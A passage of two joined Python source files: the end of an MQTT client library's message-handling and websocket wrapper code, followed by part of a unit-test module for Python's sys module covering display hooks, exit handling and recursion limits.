m.dup = True
self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup
)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
self._send_pubrel(m.mid)
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
with self._out_message_mutex:
self._inflight_messages = 0
for m in self._out_messages.values():
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
# self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
# self._inflight_messages = self._inflight_messages + 1
if self._clean_session:
if m.state != mqtt_ms_publish:
m.dup = True
m.state = mqtt_ms_publish
else:
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
def _messages_reconnect_reset_in(self):
with self._in_message_mutex:
if self._clean_session:
self._in_messages = collections.OrderedDict()
return
for m in self._in_messages.values():
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(m.mid)
else:
# Preserve current state
pass
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos, info=None):
mpkt = {
'command': command,
'mid': mid,
'qos': qos,
'pos': 0,
'to_process': len(packet),
'packet': packet,
'info': info}
with self._out_packet_mutex:
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
self._current_out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self._thread is None:
if self._in_callback_mutex.acquire(False):
self._in_callback_mutex.release()
return self.loop_write()
self._call_socket_register_write()
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command'] & 0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command %s", cmd)
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(
MQTT_LOG_DEBUG,
"Received CONNACK (%s, %s), attempting downgrade to MQTT v3.1.",
flags, result
)
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
elif (result == CONNACK_REFUSED_IDENTIFIER_REJECTED
and self._client_id == b''):
self._easy_log(
MQTT_LOG_DEBUG,
"Received CONNACK (%s, %s), attempting to use non-empty CID",
flags, result,
)
self._client_id = base62(uuid.uuid4().int, padding=22)
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._reconnect_delay = None
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK (%s, %s)", flags, result)
with self._callback_mutex:
if self.on_connect:
flags_dict = {}
flags_dict['session present'] = flags & 0x01
with self._in_callback_mutex:
try:
self.on_connect(self, self._userdata, flags_dict, result)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_connect: %s', err)
if result == 0:
rc = 0
with self._out_message_mutex:
for m in self._out_messages.values():
m.timestamp = time_func()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
return MQTT_ERR_SUCCESS
if m.qos == 0:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_puback
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubrec
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages += 1
m.state = mqtt_ms_wait_for_pubcomp
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
rc = self._send_pubrel(m.mid)
if rc != 0:
return rc
self.loop_write() # Process outgoing messages that have just been queued up
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
with self._callback_mutex:
if self.on_subscribe:
with self._in_callback_mutex: # Don't call loop_write after _send_publish()
try:
self.on_subscribe(self, self._userdata, mid, granted_qos)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_subscribe: %s', err)
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08) >> 3
message.qos = (header & 0x06) >> 1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet']) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if len(topic) == 0:
return MQTT_ERR_PROTOCOL
# Handle topics with invalid UTF-8
# This replaces an invalid topic with a message and the hex
# representation of the topic for logging. When the user attempts to
# access message.topic in the callback, an exception will be raised.
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError:
print_topic = "TOPIC WITH INVALID UTF-8: " + str(topic)
message.topic = topic
if message.qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d%d, q%d, r%d, m%d), '%s', ... (%d bytes)",
message.dup, message.qos, message.retain, message.mid,
print_topic, len(message.payload)
)
message.timestamp = time_func()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
with self._in_message_mutex:
self._in_messages[message.mid] = message
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: %d)", mid)
with self._in_message_mutex:
if mid in self._in_messages:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
message = self._in_messages.pop(mid)
self._handle_on_message(message)
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
with self._out_message_mutex:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
# FIXME: this should only be done if the message is known
# If unknown it's a protocol error and we should close the connection.
# But since we don't have (on disk) persistence for the session, it
# is possible that we must known about this message.
# Choose to acknwoledge this messsage (and thus losing a message) but
# avoid hanging. See #284.
return self._send_pubcomp(mid)
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages.values():
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages += 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(
m.mid,
m.topic.encode('utf-8'),
m.payload,
m.qos,
m.retain,
m.dup,
)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: %d)", mid)
with self._out_message_mutex:
if mid in self._out_messages:
msg = self._out_messages[mid]
msg.state = mqtt_ms_wait_for_pubcomp
msg.timestamp = time_func()
return self._send_pubrel(mid)
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: %d)", mid)
with self._callback_mutex:
if self.on_unsubscribe:
with self._in_callback_mutex:
try:
self.on_unsubscribe(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_unsubscribe: %s', err)
return MQTT_ERR_SUCCESS
def _do_on_publish(self, mid):
with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, mid)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
msg = self._out_messages.pop(mid)
msg.info._set_as_published()
if msg.qos > 0:
self._inflight_messages -= 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
return rc
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid, = struct.unpack("!H", self._in_packet['packet'])
self._easy_log(MQTT_LOG_DEBUG, "Received %s (Mid: %d)", cmd, mid)
with self._out_message_mutex:
if mid in self._out_messages:
# Only inform the client the message has been sent once.
rc = self._do_on_publish(mid)
return rc
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
matched = False
with self._callback_mutex:
try:
topic = message.topic
except UnicodeDecodeError:
topic = None
if topic is not None:
for callback in self._on_message_filtered.iter_match(message.topic):
with self._in_callback_mutex:
callback(self, self._userdata, message)
matched = True
if matched == False and self.on_message:
with self._in_callback_mutex:
try:
self.on_message(self, self._userdata, message)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_message: %s', err)
def _thread_main(self):
self.loop_forever(retry_first_connection=True)
def _reconnect_wait(self):
# See reconnect_delay_set for details
now = time_func()
with self._reconnect_delay_mutex:
if self._reconnect_delay is None:
self._reconnect_delay = self._reconnect_min_delay
else:
self._reconnect_delay = min(
self._reconnect_delay * 2,
self._reconnect_max_delay,
)
target_time = now + self._reconnect_delay
remaining = target_time - now
while (self._state != mqtt_cs_disconnecting
and not self._thread_terminate
and remaining > 0):
time.sleep(min(remaining, 1))
remaining = target_time - time_func()
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
class WebsocketWrapper(object):
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CONNCLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
def __init__(self, socket, host, port, is_ssl, path, extra_headers):
self.connected = False
self._ssl = is_ssl
self._host = host
self._port = port
self._socket = socket
self._path = path
self._sendbuffer = bytearray()
self._readbuffer = bytearray()
self._requested_size = 0
self._payload_head = 0
self._readbuffer_head = 0
self._do_handshake(extra_headers)
def __del__(self):
self._sendbuffer = None
self._readbuffer = None
def _do_handshake(self, extra_headers):
sec_websocket_key = uuid.uuid4().bytes
sec_websocket_key = base64.b64encode(sec_websocket_key)
websocket_headers = {
"Host": "{self._host:s}:{self._port:d}".format(self=self),
"Upgrade": "websocket",
"Connection": "Upgrade",
"Origin": "https://{self._host:s}:{self._port:d}".format(self=self),
"Sec-WebSocket-Key": sec_websocket_key.decode("utf8"),
"Sec-Websocket-Version": "13",
"Sec-Websocket-Protocol": "mqtt",
}
# This is checked in ws_set_options so it will either be None, a
# dictionary, or a callable
if isinstance(extra_headers, dict):
websocket_headers.update(extra_headers)
elif callable(extra_headers):
websocket_headers = extra_headers(websocket_headers)
header = "\r\n".join([
"GET {self._path} HTTP/1.1".format(self=self),
"\r\n".join("{}: {}".format(i, j) for i, j in websocket_headers.items()),
"\r\n",
]).encode("utf8")
self._socket.send(header)
has_secret = False
has_upgrade = False
while True:
# read HTTP response header as lines
byte = self._socket.recv(1)
self._readbuffer.extend(byte)
# line end
if byte == b"\n":
if len(self._readbuffer) > 2:
# check upgrade
if b"connection" in str(self._readbuffer).lower().encode('utf-8'):
if b"upgrade" not in str(self._readbuffer).lower().encode('utf-8'):
raise WebsocketConnectionError("WebSocket handshake error, connection not upgraded")
else:
has_upgrade = True
# check key hash
if b"sec-websocket-accept" in str(self._readbuffer).lower().encode('utf-8'):
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
server_hash = self._readbuffer.decode('utf-8').split(": ", 1)[1]
server_hash = server_hash.strip().encode('utf-8')
client_hash = sec_websocket_key.decode('utf-8') + GUID
client_hash = hashlib.sha1(client_hash.encode('utf-8'))
client_hash = base64.b64encode(client_hash.digest())
if server_hash != client_hash:
raise WebsocketConnectionError("WebSocket handshake error, invalid secret key")
else:
has_secret = True
else:
# ending linebreak
break
# reset linebuffer
self._readbuffer = bytearray()
# connection reset
elif not byte:
raise WebsocketConnectionError("WebSocket handshake error")
if not has_upgrade or not has_secret:
raise WebsocketConnectionError("WebSocket handshake error")
self._readbuffer = bytearray()
self.connected = True
def _create_frame(self, opcode, data, do_masking=1):
header = bytearray()
length = len(data)
mask_key = bytearray(os.urandom(4))
mask_flag = do_masking
# 1 << 7 is the final flag, we don't send continuated data
header.append(1 << 7 | opcode)
if length < 126:
header.append(mask_flag << 7 | length)
elif length < 65536:
header.append(mask_flag << 7 | 126)
header += struct.pack("!H", length)
elif length < 0x8000000000000001:
header.append(mask_flag << 7 | 127)
header += struct.pack("!Q", length)
else:
raise ValueError("Maximum payload size is 2^63")
if mask_flag == 1:
for index in range(length):
data[index] ^= mask_key[index % 4]
data = mask_key + data
return header + data
def _buffered_read(self, length):
# try to recv and strore needed bytes
wanted_bytes = length - (len(self._readbuffer) - self._readbuffer_head)
if wanted_bytes > 0:
data = self._socket.recv(wanted_bytes)
if not data:
raise socket.error(errno.ECONNABORTED, 0)
else:
self._readbuffer.extend(data)
if len(data) < wanted_bytes:
raise socket.error(EAGAIN, 0)
self._readbuffer_head += length
return self._readbuffer[self._readbuffer_head - length:self._readbuffer_head]
def _recv_impl(self, length):
# try to decode websocket payload part from data
try:
self._readbuffer_head = 0
result = None
chunk_startindex = self._payload_head
chunk_endindex = self._payload_head + length
header1 = self._buffered_read(1)
header2 = self._buffered_read(1)
opcode = (header1[0] & 0x0f)
maskbit = (header2[0] & 0x80) == 0x80
lengthbits = (header2[0] & 0x7f)
payload_length = lengthbits
mask_key = None
# read length
if lengthbits == 0x7e:
value = self._buffered_read(2)
payload_length, = struct.unpack("!H", value)
elif lengthbits == 0x7f:
value = self._buffered_read(8)
payload_length, = struct.unpack("!Q", value)
# read mask
if maskbit:
mask_key = self._buffered_read(4)
# if frame payload is shorter than the requested data, read only the possible part
readindex = chunk_endindex
if payload_length < readindex:
readindex = payload_length
if readindex > 0:
# get payload chunk
payload = self._buffered_read(readindex)
# unmask only the needed part
if maskbit:
for index in range(chunk_startindex, readindex):
payload[index] ^= mask_key[index % 4]
result = payload[chunk_startindex:readindex]
self._payload_head = readindex
else:
payload = bytearray()
# check if full frame arrived and reset readbuffer and payloadhead if needed
if readindex == payload_length:
self._readbuffer = bytearray()
self._payload_head = 0
# respond to non-binary opcodes, their arrival is not guaranteed beacause of non-blocking sockets
if opcode == WebsocketWrapper.OPCODE_CONNCLOSE:
frame = self._create_frame(WebsocketWrapper.OPCODE_CONNCLOSE, payload, 0)
self._socket.send(frame)
if opcode == WebsocketWrapper.OPCODE_PING:
frame = self._create_frame(WebsocketWrapper.OPCODE_PONG, payload, 0)
self._socket.send(frame)
if opcode == WebsocketWrapper.OPCODE_BINARY and payload_length > 0:
return result
else:
raise socket.error(EAGAIN, 0)
except socket.error as err:
if err.errno == errno.ECONNABORTED:
self.connected = False
return b''
else:
# no more data
raise
def _send_impl(self, data):
# if previous frame was sent successfully
if len(self._sendbuffer) == 0:
# create websocket frame
frame = self._create_frame(WebsocketWrapper.OPCODE_BINARY, bytearray(data))
self._sendbuffer.extend(frame)
self._requested_size = len(data)
# try to write out as much as possible
length = self._socket.send(self._sendbuffer)
self._sendbuffer = self._sendbuffer[length:]
if len(self._sendbuffer) == 0:
# buffer sent out completely, return with payload's size
return self._requested_size
else:
# couldn't send whole data, request the same data again with 0 as sent length
return 0
def recv(self, length):
return self._recv_impl(length)
def read(self, length):
return self._recv_impl(length)
def send(self, data):
return self._send_impl(data)
def write(self, data):
return self._send_impl(data)
def close(self):
self._socket.close()
def fileno(self):
return self._socket.fileno()
def pending(self):
# Fix for bug #131: a SSL socket may still have data available
# for reading without select() being aware of it.
if self._ssl:
return self._socket.pending()
else:
# normal socket rely only on select()
return 0
def setblocking(self, flag):
self._socket.setblocking(flag)
|
test_sys.py
|
from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.hasInfiniteRecursion
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
@unittest.skipUnderCinderJIT("Recursion limit not enforced: T87011403")
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIfDebug("Recursion overflows the C stack in debug")
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
@unittest.skipUnderCinderJIT("Incorrect line numbers: T63031461")
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# Make sure we signal t to end even if we exit early from a failed
# assertion.
try:
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved
# on to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
